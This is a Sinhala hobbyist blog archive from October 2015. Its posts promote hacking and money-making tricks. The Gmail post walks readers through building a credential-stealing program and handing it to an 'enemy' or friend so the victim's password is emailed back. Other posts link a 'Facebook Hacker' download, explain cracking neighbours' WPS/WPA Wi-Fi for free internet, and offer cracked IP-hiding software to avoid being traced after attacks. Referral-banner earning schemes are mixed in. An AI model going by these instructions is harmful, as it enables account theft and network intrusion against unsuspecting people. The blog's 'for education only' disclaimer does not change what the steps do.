Tricks Lanka: October 2015
My Blog WidgetsMy Blog WidgetsTechtunes

Tuesday, October 27, 2015

Operating System දෙකක් එකම වෙලාවෙ Use කරමු..(Using Virtual Machine)

Operating System දෙකක් එකම වෙලාවෙ Use කරමු...


ගොඩක් අය කැමති නෑනෙ ඔයා Use  කරන OS(operating System)එක අයින් කරල මොකුත් කරන්න බැරි  Linux OS එකක් දාගන්න..(මොකුත් කිවුවෙ ඔය සිගිති වැඩ වගේ ඒව..)ගොඩක් අය Linux,Ubuntu දන්නෙ නෑනෙ..ඒ හිනද තමයි මේ Trick එක කියල දෙන්නෙ..මේ Use එක කරල ඔයාගෙ Main OS එක ක්‍රියාත්මක වෙන ගමන් වෙන OS දෙකක් තුනක් උනත් ක්‍රියාත්මක කරන්න පුලුවන්..ඒ විදිහට තමයි අපි අපේ වැඩ කාර්යක්ශම කරගන්නෙ..තේරුනෙයි...හරි හරි..දැන් වැඩේට බහිමු...ඔයාල තාම දන්නෙ නෑනෙ Linux වලින කරන්න පුලුවන් වැඩ...කරලම බලමුකො..මේක ටිකක් ලොකු Trick එකක්..ඒ හින්ද Video එකක් දැම්ම..ඒක බලල මුලින්ම Kali Linux Install කරගෙන ඉන්නකො..පස්සෙ පුලුවන් අත්හදාබැලීම් ටිකක් කරන්න..මේ Video එකේ Kali Linux Install කරන විදිහ නෑ..Virtual Machine එකක් හදන විදිහ තමයි දාල තියෙන්නෙ..මොකද OS එකක් Install වෙන්න පැය බාගයක් විතර යනවනෙ..පැය බාගයක Video එකක් කරොත් ලොකු MB ගානක් යනවනෙ..ගොඩක් අය MB නැති අවුලෙන්නෙ ඉන්නෙ..අනික OS එකක් දාගන්න නොදන්න කෙනෙක් ඇති කියල මන් හිතන්නෙ නෑ..හරි කමක් නෑ..Kali Linux Install කරන්න නොදන්න කෙනෙක් ඉන්නව නම් මට පොඩ්ඩක් කියන්න..එකත් Video එකක් විදිහට කියල දෙන්නම්..

ඔන්න ඔය පහල Video එක බලල වැඩේ කරගන්න...Kali Linux/Back-track Linux  දෙකෙන් එකක් අනිවා ඔයා ලග තියෙන්නෙ ඕනෙ..නැත්නම් මන් ඉස්සරහට කියල  දෙන Tricks  වලින් වැඩක් වෙන්නෙ නෑ..


Posted By: Unknown on Tuesday, October 27, 2015

Monday, October 26, 2015

Advaced Hacking වලට OS එකක් ‍තෝරා ගැනීම

Advanced Hacking වලට OS එකක් ‍තෝරා ගැනීම




ඔන්න අද පොඩි නිවාඩුවක් ලැබුනා...කට්ටිය Advanced Hacking Programming ගැන Post ටිකක් දාන්න කියල ඉල්ලුවානෙ..ඔන්න එහෙනම් අද ඉදන් ඒ ගැන Post ටිකක් දාන්නම්...දැන් එහෙනම් පටාන් ගමු...ම්ම්ම්...ලොකු Subject එකක්..ඒත් කොහොම හරි කියල දෙන්නම් පුලුවන් විදිහට...මුලින්ම  බලමු වලට Advanced Hacking අයිති වෙන Topic මොනවද කියල..

1.DDOS Attack
2.SQL Injection
3.Brut Force Attack
4.Dictionary Attack

ඔන්න ඔය විදිහට එක එක ක්‍රම තිය්නව..සමහරක් ඒව දැන් දැන්  භාවිතයෙන් ඉවත් වෙලා..මොකද මේ විදිහට Hack කරන්න බැරි වෙන්න එයාලගෙ System එක දියුනු කිරීම වගේම White Hat Hackerලගේ දක්ශතාවය තමයි..හරි..දැන් කියවීම ඇති...
ඔන්න දැන් ඔයාල පොඩි වැඩ්ඩෙක් වෙන්න යන්නෙ..ඒ කියන්නෙ Website Admin Pannel එකක් Hack කරල Username Password ගන්න එක WebSite එකක් Down කරන එක වගේ පොඩි වැඩ ටිකක් කියල දෙන්න යන්නෙ..පොඩි කිවුවට පොඩිම නෑ...ටිකක් ..හරි.දැන් අපි බලමු මොනවද මේ වැඩ වලට ඕන කරන්නෙ කියල...මේ වගේ වැඩ කරන්න හොද  Programming,Scripting දැනුමක් දැනුමක් වගේම කට්ටකමත් ඕනෙ.,..නමුත් මොකුත් නොදන්න කෙනෙක්ට උනත් ගොඩක් දුරට කරගන්න පුලුවන් විදිහට මන් කියල දෙන්නම්...මුලින්ම මේ වැඩ වලට හොද OS(Operating System)එකක් ‍තෝරගෙන ඉමු...මොකද Windows XP,7,8 වගේ Normal XP වලින් මේ වගේ වැඩ කරන්න බෑ..මේ වගේ වැඩ වලට වෙනම OS තියනව..

 EX: 1.KALI LINUX   Click Here To Download Kali Linux
                                      2.BACK TRACK LINUX   Click Here To Download Back Track Linux

වගේ ඔස් එකක් තොරගන්න ඕනෙ..ඔයාල ඔය උඩ දාල තියන Link එකක් Click කරල කැමති OS එකක් ‍Download කර ගන්න..ම්න් ඔය OS දෙක Use කරල Hack කරන හැටි කියල දෙන්නම්..ඔය දෙකේ වෙනසක් නෑ..OS එකක් තිබ්බම හොදටම ඇති..
හරි..දැන් ඔයාල කැමති OS එකක් Download කරගෙන ඔයාගෙ Computer එකට Install කරගන්න..නැත්නම් මන් කියල දෙන එක Hacking වැඩක් වත් කරගන්න බැරි වෙයි..මේ එක සාමාන්‍ය Windows XP,7 වගේ නෙවෙයි..ටිකක් අල්ලගන්න අමාරුයි...අමාරුයි කියල බෑනෙ..Hacking කරන්නනම් මේව ඉගෙනගන්නම වෙනව...මේක සාමාන්‍යයෙන් UBUNTU,LINUX වගේ...කැමති අය Install කරගන්න..අකමැති අය බලන් ඉන්න..නෑ නෑ..බලන් ඉන්න ඕනෙ නෑ..මන් කියල දෙන්නම් ඔයාගෙ Main OS එක තියෙද්දි Virtual OS එකක් හදාගන්නෙ කොහොමද කියල..Video එකක් දාන්නම්..නැත්තන් මෙච්චර Sinhala කොටල මට පිස්සු හැදෙයි.....එහෙනම් ඔය කිවුව වැඩ ටික කරගන්නකො...ඊට පස්සෙ මන් සුපිරි වැඩ ටිකක් කියල දෙන්නම්..

Posted By: Unknown on Monday, October 26, 2015

Friday, October 23, 2015

මෙන්න ඔයාලටත් නොමිලේම Pen,Chip ගන්න අවස්ථාවක්(***Simple Work & 100% Working***)

මෙන්න ඔයාලටත් නොමිලේම Pen,Chip ගන්න අවස්ථාවක්(***Simple Work & 100% Working***)



ඔන්න අදත් නියම Trick එකක් කරගෙන ආව..නියමයි කිවුවට නියමම නෑ .හැබැයි පට්ට...Hikzzz.මොකද මේක 100% Free නෙ..අපේ අය වැඩියෙන්ම කැමති Free දෙන ඒවටනෙ..මෙන්න එහෙනම් නියම අවස්ථාවක් ඔයාට ඕන කැමති Gadget එකක් දවස් 15 ඇතුලත Free ගෙදරටම ගෙන්න ගන්න පුලුවන්..ඇත්තටම මේ Site එක අලුත් එකක්..හැබැයි Scam එහෙම නෙවෙයි...මේකෙත් අනිත් Site වල වගේ Survey,Referral ල හොයන්න ඕනෙ නෑ..Simple වැඩක් තියෙන්නෙ..මේ Site එකෙන් දවසකට ඔයාලගෙන් ප්‍රශ්න 2 ක් අහනව...මොන්ටිසෝරි බබාලට දෙන වගේ ප්‍රශ්න නිකන්..අය ඇස් පියාගෙන Answer දෙන්න පුලුවන්...ඒ විදිහට ප්‍රශ්න දෙකම හරියට කරොත් Point 2 ක් හම්බෙනව...Point 30 උන ගමන් ඔයාට 16GB Chip එකක්  ගෙදරටම ගෙන්න ගන්න පුලුවන්..සාමාන්‍යයෙන් දවස් 15 විතර ඔයාලට මේකෙ point 30 හොයාගන්න පුලුවන් ප්‍රශ්න දෙකට විතරක් දීල..ඉතින් පාඩු නෑනෙ...කරලම බලන්නකො..
මුලින්ම මේ Banner එක Click කරල Site එකේ Register වෙන්න...


ඊට පස්සෙ ඔයාට එන Verification E-mail එක Verify කරල Account එකට යන්න..දැන් ඔයාට Site එකේ උඩ Menu එකේ Mission කියල Tab එකක් පෙන්න තියෙයි..ඒක Click කරන්න..එතකොට මේ විදිහට ඔයාට කරන්න පුලුවන් ප්‍රශ්න ටික ලැබෙයි..

දිනකට ඔයාට ලැබෙන්නෙ උපරිම ප්‍රශ්න දෙකයි..මේ විදිහට Point හොයල ඔයාගෙ Gadget එක ඉක්මනට ලබාගන්න..මොකද මේව මිලදීගන්න එක අපිට හීන නෙ..Hkzzz..තව ක්‍රම තියනව මේකෙන් හොයන්න Point..ලේසිම ක්‍රමේ මේක හින්ද ඔන්න කියල දුන්න..එහෙනම් කරල බලන්න හැමෝම..

මෙන්න ගෙන්න ගත්ත ඒව..මම එහෙම නෙවෙයි ඈ..මගේ එක මග එනව තවම..








...Happy Earning..

Posted By: Unknown on Friday, October 23, 2015

Facebook Passsword Hack කරමු..(***Simple Trick***)

Facebook Passsword Hack කරමු.


ඔන්න ගොඩක් යාලුවෝ ඉල්ලුව නිසා මහන්සිය නොබලාම  Facebook Hack කරන්නත් Programme එකක් හැදුව.ඇත්ත වශයෙන්ම කිවුවොත් මේක ම්න් හැදුවෙ අපේ School එකේ අයිය කෙනෙක්ගෙ Coding පොඩ්ඩක් Edit කරල..ඒකට එයා තරහ නැති වෙයි කියල මන් හිතනව.හේතුව තමයි මන් Programme හදන Programming Language Package එකේ Source File  වල අඩුවක් තියනව..ඒ ටික 4GB පනිනව..ඉතින් ඒක Net එකෙන් Download කරල හදා ගන්නකන් තමයි මම Python use කරල මේක හැදුවෙ..Python මට වැඩිය හුරු නෑ..හරි හරි..වෙන කතා ඕනෙ නෑ...මේකත් අර කලින් දුන්න Gamil Hack Programme එක වගේම තමයි..ඒ හින්ද වැඩිය කියවන්න යන්නෙ නෑ ඕන්..Software එක බාගෙන වැඩේ කරගන්න..තෙරෙන්නෙ නැත්නම් කියන්න..කියල දෙන්නම්..



Click Here To Download  Facebook Hacker...
RAR Password : sh.st/bflE1

මේ Post එකට පස්සෙ පොඩි වෙනසක් කරන්න කියල හිතුව..පොඩි කොල්ලෙගෙ ඉල්ලීම අහක දාන්න බැරි කමට Advanced Hacking ගැන Post  කීපයක් දාන්න හිතුව..ඒ කියන්නෙ SQL Injection(Using SQL map),DDOS Attaack(website Hacking),Dectionary Attack(Pasword Cracking),වගේ ඒව..දැන් ඉතින් මේ වැඩේ Try කරල බලන්නකො..Programme එකේ මොකක්  හරි Error තියනවනම් කියන්න..

Posted By: Unknown on

Sunday, October 18, 2015

Gmail Password ලේසියෙන්ම Hack කරමු

G-mail Password Hack කරමු

ඔන්න අද Gmail  Password Crack කරන්න ටිකක් ලේසි Trick එකක් කියල දෙන්නම්..මෙක ක ඕනම කෙනෙකුට කරන්න පුලුවන්..අමතර දැනුමක්  ඔනෙ නෑ..මේක පොඩි Software කෑල්ලක්..මේක කරල ඔයාට එකක් හදාගන්න පුලුවන්..ඒක ඔයාගෙ තරහ කාරයාට දෙන්න...කරන්න පුලුවන් කියල..එතකොට ඒකෙනා මේ එක කරල කරන්න ගියොත් එයාගෙ එක තමයි වෙන්න..ඒ ඔක්කොම එයාගෙ එකට එනව..මේ එක හින්ද ඔයාලට මේකෙදි කරන්න දෙයක් නෑ ඇත්තටම..කරන්න තියෙන එකම දේ තමයි  කොහොමහරි මේ එක කාට හරි දෙන එක..හරි..පහල දාල තියන විදිහට වැඩේ කරගන්න..

මුලින්ම මේ Application එක බාගන්න..
RAR Password :Click Here To Download RAR Password

දැන් ඕක බාගෙන RAR Password එක දාල Extract කරගන්න..ඊට පස්සෙ Gmail Hacker Builder කියන Application එක Double Click කරන්න..දැන් මෙහෙම එකක් එයි..

මේකට ඔයාගෙ Details දීල Build කියන Button එක Click කරන්න..මෙතනට ඔයාගෙ Details දෙන්නෙ මේ Programme එකෙන් Hack කරගන්න Password එන්නෙ  ඔයාගෙ E-mail එකට..



හරි..දැන් ඔයා Victim ට දෙන්න ඕන File/Application එක Create වෙලා තියෙන්නෙ..Gmail Hacker කියල තියෙන්නෙ ඒ Programme ඒක.නිකමට Open කරල බලන්න..මොකුත් වෙන්නෙ නෑ...දැන් ඔන්න ඔය Gmail Hacker Programme එක ඔයාගෙ හතුරෙකුට හරි යාලුවෙකුට හරි දෙන්න මේකෙන් Gmail Hack කරන්න පුලුවන් කියල...ඒතකොට ඔය Programme එකෙන් Gmail Hack කරන්න ගියාට Hack වෙන්නෙ නෑ..එයාගෙ Account එක Hack වෙනව.එයාගෙ Username/E-mail  password එක ඔයාට එනව.නියමයි නේ..ඔය වගේම Facebook එකටත් Programme එකක් දෙන්නම් ඉදිරි Post එකකදී..එහෙනම් ඕක Test කරල බලන්නකෝ..

Posted By: Unknown on Sunday, October 18, 2015

Friday, October 16, 2015

Android Phone එක ලේසියෙන්ම Root කරමු..((Only One Click))

Android Phone එක ලේසියෙන්ම Root කරමු.
    

ඔන්න අද Android Phone එකක් Root කරන්නෙ කොහොමද කියල ...ගොඩක් අය මේ වැඩේ දන්නව...නොදන්න අය මේ Post එක බලල වැඩෙ කරගන්න..හරි..වැඩේට බහිමු..මන් කියල දෙන්නෙ ලේසිම ක්‍රමයක්..Software එකක් Use කරල තමයි ඔයාගෙ Android Phone එක Root කරන්නෙ..ඒ කියන්නෙ මේ වැඩේට ඔයාට Computer එකක් ඕන කරනව...මන් දාල තියන විදිහට වැඩේ කරන්න..වරද්දන්න එහෙම එපා..වැරදුනොත් ඔයාගෙ Phone එක විසික්කන්න තමයි වෙන්නෙ...ඒ හින්ද පරිස්සමට හොදේ..


                               මුලින්ම මේ එක බාගෙන ඉන්න..
Click Here To Download VROOT English Version V1.7 


දැන් ඔය Software එක බාගෙන ඔයාගෙ පරිගනකයට Install කරන්න..ඊට පස්සෙ VROOT Software එක Open කරන්න..එතකොට මෙහෙම එකක් එයි..



දැන් ඕක ඔහොම තියල ඔයාගෙ Android Phone එක අතට ගන්න..දැන් Settings වලට යන්න..එකෙ තියන Developoer Option එකට යන්න..දැන් ඒක Enable කරන්න..දැන් ඒ යටතේ තියන USB Debugging කියන එකත් Enable කරන්න..නැත්නම් Phone එක Computer එකට වෙන්නෙ නෑ...දැන් ඔක්කොම හරි..ඔයාගෙ Phone එක Machine  එකට කරන්න..Data Cable එකෙන්...ඊට පස්සෙ මේ Software එක ඔයාගෙ Phone එක Detect කරගන්නකන්  ටිකක් ඉන්න..සමහර විට Connect කියල කොල පාට Button එකක් වැටෙයි..එක Click කරන්න..Detect කරගත්තට පස්සෙ ඔයාගෙ Android Phone එකේ Model Name එක මේ Software එකේ පෙන්නයි..ඊට පස්සෙ ROOT කියල තියන කොලපාට Button එක Click කරන්න.

දැන් ඔයාගෙ Phone එක් ROOT වෙන්න පටන් අරන් තියෙන්නෙ..මේ වෙලාවෙ Phone එකටවත් Machine එකටවත් මොකුත් කරන්න එපා..මොකද ඔය වෙලාවෙ මොකක් හරි උනොත් ඔයාගෙ Phone එක අය ON වෙන්නෙ නෑ..Crash වෙනව..ඒ හින්ද පරිස්සමට.
ROOT උනාට පස්සෙ ඔයාගෙ Phone එක Auto Restart වෙයි..දැන් වැඩේ හරි..ඔයාගෙ Phone එක ROOT වෙලා ඉවරයි.

.දැන් ඉතින් ඔයාට ඕනම Hack වැඩක් උනත් ඔයාගෙ ROOTED Android Phone එකෙන් කරන්න පුලුවන්..ඒක විතරක් නෙවෙයි...තව ඕන තරම් සුපිරි වැඩ කරන්න පුලුවන්..එවා පස්සෙ කියල දෙන්නම්කො..මොකක් හරි ප්‍රශ්නයක් තියනව නම් Comment එකකින් හරි FB එකෙන් හරි අහන්න..පුලුවන් විදිහට උදවු කරනව...

Posted By: Unknown on Friday, October 16, 2015

Article Share කරල මුදල් උපයමු..((Simple Method & Earn Big Money..))

Article Share කරල මුදල් උපයමු...

ඔන්න අද Internet එකෙන් සල්ලි හොයන්න පුලුවන් ලේසිම ක්‍රමයක් කියල දෙන්න යන්නෙ.PTC(Paid To Click) Site වල වගේ කට්ට කන්න ඕනෙ නෑ Site මේ එක තියනකන්.එහෙනම් කට්ටියම Ready වෙන්නකො වැඩේට..
මේකෙ ඇත්තටම ඔයාට කරන්න දෙයක් නෑ..කරන්න තියෙන්නෙ මේ Site එක Register වෙලා එයාල Articles දෙන ඔයාගෙ facebook,G+  ඔන්න ඔය වගේ Social Media වල Share කරන එක විතරයි...ඔයා Share කරන Article කවුරු හරි කියෙවුවොත් ඔයාට මුදල් ලැබෙනව..$2 උන ගමන් ඔයාට ඔයාගෙ ඉපයීම(payout) ලබාගන්න පුලුවන්..දැනටනම් මේ Trusted Site එකක් ...Sure එකට සල්ලි දෙනව..ඒ හින්ද ඉක්මනට Register වෙලා කීයක් හරි හොයා ගන්න..
ඔන්න ඔය Banner එක Click කරල Site එකේ Register වෙන්න..Register වෙන එක අය කියල දෙන්න ඕනෙ නෑනෙ..

Posted By: Unknown on

Wednesday, October 14, 2015

WIFI හැක් කරල නොමිලේම Internet යමු..(100% Working For WPA/WPS Networks)

WIFI හැක් කරල නොමිලේම Internet යමු..


ඔන්න අදත් පට්ට Trick එකක් අරගෙන ආව..මේකත් නොමිලේම Internet යන්න පුලුවන් තව ක්‍රමයක්...ලංකාවෙ හැම ගෙදරකටම අඩුම ගානෙ එක Wifi Lan එකක්වත් අහු වෙනවනෙ..එහා ගෙදර එකාගෙ හරි..මමනම් වැඩියෙන්ම Internet යන්නෙ එහා ගෙදර Wifi Lan එකෙන්.දැන්නම් ඒ වැඩේ නතර කරා තාවකාලිකව..ඇත්තටම මේකෙදි Wifi Hack කරනව කියන්නෙWifi Lan  එකේ Password එක Crack කරගන්න එක...Password Cracking කියලත් කියන්න පුලුවන්..වර්තමානයේ Wifi Hack කරගන්න Application/Android Apps වගේ ඒව සැහෙන්න තියන්ව..හැබැයි ඒවගෙ මොනව මොනව තියන්වද කියල කවුද දන්නෙ..ඒ හින්ද ඒව Use කරනකොට පරිස්සමට..වැඩිය කතා නැතුව වැඩේට බහිමු...මුලින්ම මේ එක Android App බාගෙන ඉන්නකො..Windows/Kali වලින හැක් කරන එක ටිකක් අමාරුයි..ඒ උනාට ඒකත් කියල දෙනව ඈ...මොකද හැමෝ ගාවම Android Phone නෑනෙ..
Click Here To Download App


දැන් ඔය App එක Download කරගෙන ඔයාගෙ Android Phone එකේ Install කරන්න..ඊට පස්සෙ ඔයාගෙ Android Phone එකේ WIFI on කරන්න.....මේ මොනව කරන්නත් ඔයගෙ Android Phone එක Root කරල තියෙන්න ඕනෙ..මොකද මේ වගේ App Run වෙන්න Root Permission එක දෙන්න ඕනෙ..නැත්නම් වැඩ කරන්නෙ නෑ..ඒ හින්ද ඔයාගෙ Android Phone එක මුලින්ම Root කරගෙන ඉන්න.Root කරනව කියන්නෙ Phone එකේ තියන සීමාවන් බිදනව කියන එක..Android Phone Root කරන හැටි නොදන්න කෙනෙක් නෑ කියල මන් හිතනව..නොදන්න කෙනෙක් ඉන්නවනම් Comment එකක් දාන්න..මන් කියල දෙන්නම්...

හරි දැන් ඔය WPS WPA TESTER කියන App එක Open කරන්න..

Open කරානම් ඔයාගෙ Android Phone එකට අහුවෙන WIFI Networks ඔක්කොම ටික පෙන්නයි ..මෙන්න මේ විදිහට..


ඔතනින් ඔයාට Password එක Crack කරගන්න පුලුවන් වෙන්නෙ WPS/WPA කියල වැටිල තියන වල විතරයි..ඒවගෙන් ඔයාට කැමති එකක් Click කරන්න..(කොලපාට වෙලා තියෙන්නෙ)
ඊට පස්සෙ ඔන්න ඔය වගේ එකක් එයි.

.එකෙ Try to connect(root) Click කරන්න..දැන් වැඩේ හරි..විනාඩියක් යන්න කලින Passsword එක ඔයාගෙ අතේ..දැන් ඔය Password එක දීල Free Internet යන්න..
හැබැයි එකේ අයිතිකාරයා මොනවහරි ගේමක් දීල WIFI HACK කරපු එවුන් ටික හොයා ගත්තොත් ඔන්න මන් නෑ..
අධ්‍යාපනයට පමනි..

Posted By: Unknown on Wednesday, October 14, 2015

Sunday, October 11, 2015

නිකන් ඉන්න එකේ Mini Job කරල ලේසියෙන් මුදල් උපයමු..(Microworkers 2)...

නිකන් ඉන්න එකේ Mini Job කරල ලේසියෙන් මුදල් උපයමු..(Microworkers 2)...




ඔන්න අදත් E-money Post එකක් අරගෙන ආව..කලින් කිවුව වගේ Microworkers Site එකේ Jobs කරන හැටි කියල දෙන්නම් අද..දැන් හැමොම Site එකේ Register වෙලා Acccount එකක් හදාගෙන ඇති කියල හිතනව..එහෙනම් අදම සල්ලි කීයක් හරි හොයාගමු..මෙන්න මේ විදිහට වැඩේ කරගන්න..
මුලින්ම  ඔයාගෙ Account එකට Log වෙන්න..
දැන් ඔය වගෙ එයි..

දැන් කියන Tab එක Click කරන්න..ඊට පස්සෙ ඔයාට කරන්න පුලුවන් Jobs List එකක් එයි..ඒකෙන් ඔයා කැමති ඔයාට කරන්න පුලුවන් Job එක උඩ කරන්න..
ඊට පස්සෙ මේ වගේ එකක් එයි..

මේ තමයි ඔයා ‍තෝරපු Job එක කරන්න ඕන විදිහයි එකේ විස්තර ටිකයි..ඒක හොදට කියවන්න..මොකද ඔය කියල තියන විදිහට තමයි අපි Job එක කරන්න ඕනෙ..එයාලට ඕන විදිහට අපි එක කරේ නැත්නම් එයාල Job එක Cancel කරනව..
මන් ‍තෝර ගත්තෙ වෙන Site එකක Sing Up වෙන Job එකක්...ඒ Site එකේ  අපේ නමින Account එකක් හැදුවොත් එයාල අපිට $0.2 ගෙවනව..කරාට පාඩු නෑ.ඔය වගේ Job 10 විතර දවසකට කර ගත්තොත් $1 විතර අපේ අතේ...මාසයක් ඔහොම කරොත් අය ගොඩනෙ..
ඕක විතරක් නෙවේ..තව ගොඩාක් එක එක විදිහෙ Job ඔයාට කරන්න පුලුවන්
දැන් ඔයා ‍තෝර ගත්ත එක කරන්න පුලුවනන්ම් ඔය Page එකේම පහලට වෙන්න ඇති I accept this job කියල Button  එකක් ඇති..ඒක Click කරන්න..

ඒක Click කරහම පොඩි Text Area එකක් එයි.

ඔයා මේ Job එක Complete කරා කියල තහවුරු කරන්න Proof  ටික දාන්නෙ ඔන්න ඔය Text Area එකේ තමයි..Proof දැම්මෙ නැත්නම් එයාල ඔයාගෙ Job එක Approve කරන්නෙ නෑ..අනික මං කලින් කිවුව වගේ ඔයාල නිවැරදිව මේ Jobs කරේ නැත්නම් ඔයාලගෙJob එක Cancel වෙනව..එහෙම වෙන එක ඔයාගෙ Account එකට හොද නෑ..දිගටම ඔයා කරන Jobs Cancel උනොත් ඔයාගෙ Account එකත් Banned වෙන්න පුලුවන්..ඒ නිසා කරන එක හරියටම කරන්න..
හැරි දැන් ඔයා ‍තෝරගත්ත Job එකේ තියන විදිහට එක කරානම් Proof ටික අර Text Area එකේ දාන්න..ඊට පස්සෙ I Confirm that I have this task කියන Button එක Click කරන්න..දැන් ඔයාගෙ Job එක Complete වෙලා ඉවරයි..අදම නැත්තම් සතියක් ඇතුලත ඔයාගෙ Job එක අදාල  මුදල් Account එකට එකතු වෙයි...හරියට Job එක කරනම් අනිවා ඔයාට මුදල් ලැබෙනව..
එහෙනම් Microworkers වලින් මුදල් උපයන ක්‍රම ටික කියල දුන්න ඔන්න..මේක ඔයාලට තවත් පැහැදිලි වෙන්න මන් Video Tut එකක්කුත් දාන්නම්..තෙරුනේ නැති අය ඒක බලාගෙන කරගන්න...අනිත් site වල සල්ලි හොයනවට වඩා Site මේ එකන් සල්ලි හොයන්න ලේසි..ඒ හින්ද නිකන් ඉන්න එකේ මේකවත් කරල බලන්න..
...Happy Earning...

Video Tut


Posted By: Unknown on Sunday, October 11, 2015

Saturday, October 10, 2015

නිකන් ඉන්න එකේ Mini Job කරල ලේසියෙන් මුදල් උපයමු..(Microworkers 1)...

නිකන් ඉන්න එකේ Mini Job කරල ලේසියෙන් මුදල් උපයමු...


ඔන්න අද E-money කරන්න හොදම Site එකක් ගැන කියල දෙන්න යන්නෙ..මේ Site එකෙන් මුදල් උපයන සියලුම ක්‍රම මුල ඉදන් කියල දෙනව..හොදේ..ඒ හින්ද බය නැතුව වැඩේ පටන් ගන්න..ඇත්තටම මේ Site එක ගොඩක් පරන එකක්...මේකෙන් සල්ලි හම්බ කරන අය ඕන තරම් ඉන්නව ලංකාවෙ.මම නම් තාම මේකෙන් කරල නෑ...නමුත් සල්ලි ගත්ත අය ගොඩක් ඉන්නව.කොහොමත් මේ Site එක Members ල උපයන සල්ලි අනිවා ගෙවනව..නැත්නම් ඕක මෙචචර කල් තියෙන්නෙ නෑ..අනික Page Rank එකෙන් හොයා ගන්න පුලුවන් Sacm ද කියල...මේ Site එකෙන් සල්ලි හොයන එක අනිත් වලින් සල්ලි හොයනවට වඩා ලේසි..මොකද මේ එකේ පොඩි පොඩි Job කරල තමයි සල්ලි හොයන්න තියෙන්නෙ..Sing Up,Google Search,Blog Posting,FB Like වගේ පොඩි Job තමයි තියෙන්නෙ..$9 උනාට පස්සෙ Paypal එකට සල්ලි ගන්න පුලුවන්..ඕනම කෙනෙකුට මේ Site එකන් සල්ලි හොයන්න පුලුවන්..කියල දෙන්න දෙයක් නෑ..

සාමන්‍යයෙන් වලට දෙන මුදල් ප්‍රමානයන්...
Blog Posting:$0.5-$0.6
Sing Up:$0.1-$0.3
Google Search:$0.09-$0.1

ඔන්න ඔය Rate එකේ තමයි මේ Site එකෙන් Mini Job වලට සල්ලි ගෙවන්නෙ..එක එක විදිහෙ Job ගොඩක් තියනව..ඔයාලට කැමති ප්‍රමානයක් දවසකට කරන්න පුලුවන්..Limit එකක් නෑ..මේ Site එකන් දවසකට Job 10 ගානෙ මාසයක් විතර කරොත් ඔයාල හොද ගානක් හොයාගන්න පුලුවන්.ඔය වැඩේට පැයක්වත් යන්නෙ නෑ..ඒ හින්ද අපේ කාලෙත් ඉතුරුයි...අය සල්ලි Sure....

පහල දාල තියන විදිහට Site එකේ Register වෙලා අදම කීයක් හරි හොයා ගන්න නිකන් ඉන්න එකේ..
පහල Banner එක Click කරල Site එකට යන්න..


දැන් ඔයා Site එකට ගියානම් Form එකක් පුරවන්න එයි..ඒකෙ ඔයාගෙ Details ටික දාල Submit Button එක Click කරන්න..එක Fill කරද්දි ගොඩක් සැලකිලිමත් වෙන්න..බොරු තොරතුරු එහෙම දෙන්න එපා..මොකද මේ Site එක ගොඩක් ප්‍රසිද්ධ Trusted Site එකක්...ඔයා උපයපු මුදල් Payout කරන්න කලින් මෙයාල ඔයාගෙ ගෙදරට Pin Number එකක් එවනව..ඒ Pin Numbe එකෙන් තමයි ඔයාගෙ Payout එක Approve කරගන්නෙ..ඔයා බොරු එහෙම දීල තිබ්බොත් ඔයාගෙ Payment එක Cancel වෙනව..ඒ හින්ද සැලකිල්ලෙන් Form එක පුරවන්න...

ඔයා Form එක පුරවලා Submit කරානම් ඔයාගෙ e-mail එකට Verifiaction E-mail/Link එක එයි...ඒ Link එක Click කරල Account එක Verify කරගන්න..ඊට පස්සෙ ඔයාට ඔයාගෙ Account එකට Log වෙන්න පුලුවන්..
Account එකට Log උනානම් මේ වගේ එකක් එයි..එක එක Job පෙනෙන්න තියෙයි..


ඔය තියෙන්නෙ ඔයාට කරන්න පුලුවන් Jobs ටික..කැමති ඕනම Job එකක් කරන්න පුලුවන්..ඕනෙනම් ඔක්කොම උනත් කරන්න පුලුවන්..ඊලග දවසෙ ඔය වගෙම Job වලින ඔයාගෙ Account එක පිරිල තියෙයි..ඔතනින් එහාට කියල දෙන්න ඕනෙ කියල මන් හිතන්නෙ නෑ..ඕක ගේමක් නෑ අපේ කොල්ලන්ට..කමක් නෑ..තව Post එකකින් ‍Job තෝර ගන්න හැටි,Job කරන හැටි කියල දෙන්නම්කො..
Happy Earning!!!


Posted By: Unknown on Saturday, October 10, 2015

Friday, October 9, 2015

Hack කරන්න කලින තමන් ආරක්ෂා වෙන්න..


Hack කරන්න කලින තමන් ආරක්ෂා වෙන්න..
(IP Hiding)



ඔන්න අද පොඩි Trick එකක් අරගෙන ආවෙ..ඒ උනාට මේ Trick එක ගොඩක් වැදගත් Hacking අත්හදා බලන අයට..මොකද කවුරු හරි කාට හරි Hacking Attack එකක් දුන්නොත් ඒ Hack උන කෙනා Hacking ගැන දන්න කෙනෙක් නම් තමන්ව Hack කරේ කවුද කියල හොයාගන්න පුලුවන්..එතකොට වැඩ ඔක්කොම ඉවරයි...
ඒ හදුනා ගැනීම ප්‍රධාන වශයෙන් කරන්නෙ ඔයාගෙ IP(Internet Protocol) Address එකෙන්..
කාගෙ හරි IP Address එකක් දන්නව කියන්නෙ මොනවද කරන්න බැරි...ඒ හිනද ඔක්කොටම කලින් අපි ආරක්ෂා වෙලා ඉන්න ඕනෙ..ඔයා Internet Brows කරනකොට ඔයාගෙ ISP(Internet Service Provider) දෙන IP Address එක Hide කර ගත්තන්ම් වැඩේ හරි...අය හොයනව බොරු..එක කරගන්න ලෝකෙ ඕන තරම් Application එක එක අය හදල තියනව..හැබැයි නිකන් නෙවෙයි සල්ලි වලට...ඕකට සල්ලි වියදම් නොකර වැඩෙ කරගන්න Software ටිකක් දෙනනම් Crack එකත් එක්කම..ඒ කියන්නෙ Full Version ඈ..පහලින් දාල තියෙන්නෙ ගොඩක් අය Use කරන හොදම Ip Hide කරන Software ටිකක්..ඕන අය බාගන්න..බාගත්ත කියල් ඔය ඔක්කොම Install කරන්න යන්න එපා..ඕවගෙන් එකක් තිබ්බ නම් හොදටම ඇති.හොදේ..







Posted By: Unknown on Friday, October 9, 2015

Thursday, October 8, 2015

සල්ලිත් එපා..Data එපා..Android Phone එකෙන් නොමිලේම Internet යමුද..

                               හැමදාම Android Phone එකෙන්                                    නොමිලේම Internet යමුද...



ඔන්න අද නියම Trick එකක් කියල දෙන්න යන්නෙ..කවුද අකමැති ඔයාගෙ Android Phone එකෙන් නොමිලේම Internet යන්න..සල්ලි කැපෙන්නෙත් නෑ..Data කැපෙන්නෙත් නෑ..හැබැයි මේක ගොඩක් අය දන්නව..නොදන්න අයටයි කියල දෙන්නෙ...මෙන්න මේ විදිහට වැඩේ කර ගන්න..
ඉස්සෙරලාම මේ Android App එක බාගෙන ඉන්නකො...

